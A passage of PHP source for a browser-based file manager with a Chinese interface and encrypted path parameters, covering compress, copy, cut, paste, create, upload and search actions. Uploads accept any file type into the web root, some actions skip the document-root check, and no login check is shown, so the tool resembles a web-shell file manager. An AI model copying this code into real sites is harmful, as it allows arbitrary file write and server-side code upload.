'.zip'; $zip = new ZipArchive(); if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) { if (is_dir($path)) { addFolderToZip($zip, $path, basename($path)); } else { $zip->addFile($path, basename($path)); } $zip->close(); echo '<div class="success">压缩成功!</div>'; echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; } else { throw new Exception("无法创建压缩文件!"); } } catch (Exception $e) { echo '<div class="error">压缩出错:' . htmlspecialchars($e->getMessage()) . '</div>'; if (isset($encryptedParentPath)) { echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; } } break; case 'copy': try { $encryptedPath = urldecode($_GET['source_path']); $sourcePath = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($sourcePath)) { throw new Exception("非法路径!"); } if (empty($encryptedPath)) { throw new Exception("缺少源文件路径"); } $realSource = realpath($sourcePath); if ($realSource === false) { throw new Exception("源文件不存在"); } $baseDir = realpath($_SERVER['DOCUMENT_ROOT']); if (strpos($realSource, $baseDir) !== 0) { throw new Exception("不允许操作该路径"); } session_start(); $_SESSION['copy_source'] = $realSource; $_SESSION['copy_source_encrypted'] = $encryptedPath; $_SESSION['operation_type'] = 'copy'; $currentDir = dirname($realSource); $encryptedCurrentPath = aesEncrypt($currentDir, $encryptionKey); $fileName = basename($realSource); echo '<div style="color:green; padding:10px; background:#d4edda; border:1px solid #c3e6cb;">'; echo '已复制: ' . htmlspecialchars($fileName) . ' - 请导航到目标目录后点击"粘贴"按钮'; echo '</div>'; header('Location: ?a=index&b=list&path=' . urlencode($encryptedCurrentPath)); exit; } catch (Exception $e) { echo '<div style="color:red;">复制失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; $encryptedPath = isset($currentDir) ? aesEncrypt($currentDir, $encryptionKey) : $path; echo '<a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '">返回</a>'; } break; case 'cut': try { $encryptedPath = urldecode($_GET['source_path']); $sourcePath = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($sourcePath)) { throw new Exception("非法路径!"); } if (empty($encryptedPath)) { throw new Exception("缺少源文件路径"); } $realSource = realpath($sourcePath); if ($realSource === false) { throw new Exception("源文件不存在"); } $baseDir = realpath($_SERVER['DOCUMENT_ROOT']); if (strpos($realSource, $baseDir) !== 0) { throw new Exception("不允许操作该路径"); } session_start(); $_SESSION['copy_source'] = $realSource; $_SESSION['copy_source_encrypted'] = $encryptedPath; $_SESSION['operation_type'] = 'cut'; $currentDir = dirname($realSource); $encryptedCurrentPath = aesEncrypt($currentDir, $encryptionKey); $fileName = basename($realSource); echo '<div style="color:green; padding:10px; background:#d4edda; border:1px solid #c3e6cb;">'; echo '已剪切: ' . htmlspecialchars($fileName) . ' - 请导航到目标目录后点击"粘贴"按钮'; echo '</div>'; header('Location: ?a=index&b=list&path=' . urlencode($encryptedCurrentPath)); exit; } catch (Exception $e) { echo '<div style="color:red;">剪切失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; $encryptedPath = isset($currentDir) ? aesEncrypt($currentDir, $encryptionKey) : $path; echo '<a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '">返回</a>'; } break; case 'paste': try { session_start(); if (! isset($_SESSION['copy_source']) || ! file_exists($_SESSION['copy_source'])) { throw new Exception("没有可粘贴的项目"); } $sourcePath = $_SESSION['copy_source']; $operationType = isset($_SESSION['operation_type']) ? $_SESSION['operation_type'] : ''; $isCut = ($operationType === 'cut'); $realSource = realpath($sourcePath); if ($realSource === false || ! file_exists($realSource)) { throw new Exception("源文件不存在或已被移动"); } $encryptedTargetDir = isset($_GET['path']) ? $_GET['path'] : ''; if (empty($encryptedTargetDir)) { throw new Exception("缺少目标路径参数"); } $targetDir = aesDecrypt($encryptedTargetDir, $encryptionKey); if (! isValidPath($targetDir)) { throw new Exception("非法目标路径"); } $realTargetDir = realpath($targetDir); if ($realTargetDir === false) { throw new Exception("目标目录不存在"); } if (realpath($realSource) === realpath($realTargetDir)) { throw new Exception("不能移动到自身"); } if (is_dir($realSource) && strpos($realTargetDir, $realSource) === 0) { throw new Exception("不能移动到自己的子目录"); } $fileName = basename($realSource); $targetPath = $realTargetDir . DIRECTORY_SEPARATOR . $fileName; if (file_exists($targetPath)) { $counter = 1; $fileInfo = pathinfo($fileName); $baseName = $fileInfo['filename']; $extension = isset($fileInfo['extension']) ? '.' . $fileInfo['extension'] : ''; while (file_exists($targetPath)) { $newFileName = $baseName . '_' . $counter . $extension; $targetPath = $realTargetDir . DIRECTORY_SEPARATOR . $newFileName; $counter++; if ($counter > 100) { throw new Exception("无法生成唯一的文件名"); } } } if ($isCut) { if (is_dir($realSource)) { if (! rename($realSource, $targetPath)) { throw new Exception("移动目录失败"); } } else { if (! rename($realSource, $targetPath)) { throw new Exception("移动文件失败"); } } } else { if (is_dir($realSource)) { if (! copyDirectory($realSource, $targetPath)) { throw new Exception("复制目录失败"); } } else { if (! copy($realSource, $targetPath)) { throw new Exception("复制文件失败"); } } } unset($_SESSION['copy_source']); unset($_SESSION['copy_source_encrypted']); unset($_SESSION['operation_type']); $operationText = $isCut ? '移动' : '复制'; echo $operationText . '成功: ' . htmlspecialchars($fileName); echo '</div>'; echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($encryptedTargetDir) . '" style="text-decoration:none;color:inherit;">返回文件列表</a></button>'; } catch (Exception $e) { echo '<div>粘贴失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; $encryptedPath = isset($encryptedTargetDir) ? $encryptedTargetDir : (isset($path) ? $path : ''); echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '" style="text-decoration:none;color:inherit;">返回</a></button>'; } break; case 'cancel_cut': unset($_SESSION['copy_source']); unset($_SESSION['copy_source_encrypted']); unset($_SESSION['operation_type']); $encryptedPath = isset($_GET['path']) ? $_GET['path'] : ''; if (empty($encryptedPath)) { $encryptedPath = aesEncrypt($_SERVER['DOCUMENT_ROOT'], $encryptionKey); } header('Location: ?a=index&b=list&path=' . urlencode($encryptedPath)); exit; break; case 'create_file': try { $encryptedPath = isset($_GET['path']) ? $_GET['path'] : ''; if (empty($encryptedPath)) { throw new Exception("缺少目录参数"); } $currentDir = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($currentDir)) { throw new Exception("非法路径!"); } $filename = trim(isset($_GET['filename']) ? $_GET['filename'] : ''); if (empty($filename)) { throw new Exception("文件名不能为空"); } if (preg_match('/[\/\\\\:\*\?"<>\|]/', $filename)) { throw new Exception("文件名包含非法字符"); } $filePath = $currentDir . DIRECTORY_SEPARATOR . $filename; if (file_exists($filePath)) { throw new Exception("文件已存在"); } if (! touch($filePath)) { throw new Exception("文件创建失败"); } chmod($filePath, 0644); $encryptedCurrentDir = aesEncrypt($currentDir, $encryptionKey); header('Location: ?a=index&b=list&path=' . urlencode($encryptedCurrentDir)); exit; } catch (Exception $e) { echo '<div style="color:red;">创建文件失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; $encryptedPath = isset($currentDir) ? aesEncrypt($currentDir, $encryptionKey) : ''; echo '<a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '">返回</a>'; } break; case 'create_folder': try { $encryptedPath = isset($_GET['path']) ? $_GET['path'] : ''; if (empty($encryptedPath)) { throw new Exception("缺少目录参数"); } $currentDir = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($currentDir)) { throw new Exception("非法路径!"); } $foldername = trim(isset($_GET['foldername']) ? $_GET['foldername'] : ''); if (empty($foldername)) { throw new Exception("文件夹名不能为空"); } if (preg_match('/[\/\\\\:\*\?"<>\|]/', $foldername)) { throw new Exception("文件夹名包含非法字符"); } $folderPath = $currentDir . DIRECTORY_SEPARATOR . $foldername; if (file_exists($folderPath)) { throw new Exception("文件夹已存在"); } if (! mkdir($folderPath, 0755, true)) { throw new Exception("文件夹创建失败"); } $encryptedCurrentDir = aesEncrypt($currentDir, $encryptionKey); header('Location: ?a=index&b=list&path=' . urlencode($encryptedCurrentDir)); exit; } catch (Exception $e) { echo '<div style="color:red;">创建文件夹失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; $encryptedPath = isset($currentDir) ? aesEncrypt($currentDir, $encryptionKey) : ''; echo '<a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '">返回</a>'; } break; case 'upload': try { if (! isset($_FILES['upload_file']) || $_FILES['upload_file']['error'] == UPLOAD_ERR_NO_FILE) { throw new Exception("没有选择要上传的文件"); } $uploadFile = $_FILES['upload_file']; $encryptedPath = isset($_POST['path']) ? $_POST['path'] : ''; if (empty($encryptedPath)) { throw new Exception("缺少路径参数"); } $targetDir = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($targetDir)) { throw new Exception("非法路径!"); } $realTargetDir = realpath($targetDir); if ($realTargetDir === false) { throw new Exception("目标目录不存在"); } if ($uploadFile['error'] !== UPLOAD_ERR_OK) { $errorMessages = [ UPLOAD_ERR_INI_SIZE => '文件大小超过服务器限制', UPLOAD_ERR_FORM_SIZE => '文件大小超过表单限制', UPLOAD_ERR_PARTIAL => '文件只有部分被上传', UPLOAD_ERR_NO_FILE => '没有文件被上传', UPLOAD_ERR_NO_TMP_DIR => '缺少临时文件夹', UPLOAD_ERR_CANT_WRITE => '写入磁盘失败', UPLOAD_ERR_EXTENSION => 'PHP扩展阻止了文件上传', ]; throw new Exception(isset($errorMessages[$uploadFile['error']]) ? $errorMessages[$uploadFile['error']] : "未知上传错误"); } $baseDir = realpath($_SERVER['DOCUMENT_ROOT']); if (strpos($realTargetDir, $baseDir) !== 0) { throw new Exception("不允许上传到该目录"); } $fileName = basename($uploadFile['name']); if (empty($fileName)) { throw new Exception("无效的文件名"); } if (preg_match('/[\/\\\\:\*\?"<>\|]/', $fileName)) { throw new Exception("文件名包含非法字符"); } $targetPath = $realTargetDir . DIRECTORY_SEPARATOR . $fileName; if (file_exists($targetPath)) { throw new Exception("文件已存在"); } if (! is_uploaded_file($uploadFile['tmp_name'])) { throw new Exception("非法文件来源"); } if (! move_uploaded_file($uploadFile['tmp_name'], $targetPath)) { throw new Exception("文件移动失败,请检查目录权限"); } chmod($targetPath, 0644); session_start(); if (! isset($_SESSION['upload_history'])) { $_SESSION['upload_history'] = []; } $_SESSION['upload_history'][] = [ 'filename' => $fileName, 'filepath' => $targetPath, 'upload_time' => date('Y-m-d H:i:s'), ]; $encryptedTargetDir = aesEncrypt($realTargetDir, $encryptionKey); header('Location: ?a=index&b=list&path=' . urlencode($encryptedTargetDir)); exit; } catch (Exception $e) { echo '<div style="color:red;">上传失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; if (isset($encryptedPath)) { echo '<a href="?a=index&b=list&path=' . urlencode($encryptedTargetDir) . '">返回</a>'; } else { $encryptedRoot = aesEncrypt($_SERVER['DOCUMENT_ROOT'], $encryptionKey); echo '<a href="?a=index&b=list&path=' . urlencode($encryptedRoot) . '">返回</a>'; } } break; case 'search': try { $keyword = trim(isset($_GET['keyword']) ? $_GET['keyword'] : ''); if (empty($keyword)) { throw new Exception("请输入搜索关键词"); } $encryptedPath = isset($_GET['path']) ? $_GET['path'] : ''; if (empty($encryptedPath)) { throw new Exception("缺少路径参数"); } $searchPath = aesDecrypt($encryptedPath, $encryptionKey); if (! $searchPath) { throw new Exception("路径解密失败"); } if (! isValidPath($searchPath)) { throw new Exception("非法路径!"); } $realSearchPath = realpath($searchPath); $baseDir = realpath($_SERVER['DOCUMENT_ROOT']); if ($realSearchPath === false || strpos($realSearchPath, $baseDir) !== 0) { throw new Exception("不允许搜索该目录"); } echo '<h2>搜索结果: ' . htmlspecialchars($keyword) . '</h2>'; $encryptedReturnPath = aesEncrypt($searchPath, $encryptionKey); echo '<div class="navigation"> <a href="?a=index&b=list&path=' . urlencode($encryptedReturnPath) . '">返回文件列表</a> </div>'; $results = searchFiles($realSearchPath, $keyword); if (empty($results)) { echo '<p>没有找到匹配的文件</p>'; } else { echo '<table border="1" cellpadding="6" cellspacing="0"> <tr><th>文件名</th><th>路径</th><th>大小</th><th>类型</th></tr>'; foreach ($results as $file) { $encryptedFilePath = aesEncrypt($file['path'], $encryptionKey); $encryptedDirPath = aesEncrypt(dirname($file['path']), $encryptionKey); $fileName = basename($file['path']); echo '<tr> <td>' . htmlspecialchars($fileName) . '</td> <td>' . htmlspecialchars(dirname($file['path'])) . '</td> <td>' . formatSize($file['size']) . '</td> <td>' . ($file['is_dir'] ? '文件夹' : '文件') . '</td> <td> <a href="?a=index&b=list&path=' . urlencode($encryptedDirPath) . '">打开位置</a> | <a href="?a=index&b=ck&path=' . urlencode($encryptedFilePath) . '">查看</a> </td> </tr>'; } echo '</table>'; } } catch (Exception $e) { echo '<div style="color:red;">搜索错误: ' . htmlspecialchars($e->getMessage()) . '</div>'; $encryptedPath = isset($currentDir) ? aesEncrypt($currentDir, $encryptionKey) : ''; if (isset($encryptedPath)) { echo '<a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '">返回</a>'; } else { $encryptedRoot = aesEncrypt($_SERVER['DOCUMENT_ROOT'], $encryptionKey); echo '<a href="?a=index&b=list&path=' . urlencode($encryptedRoot) . '">返回首页</a>'; } } break; } break; }
保存
取消
返回文件列表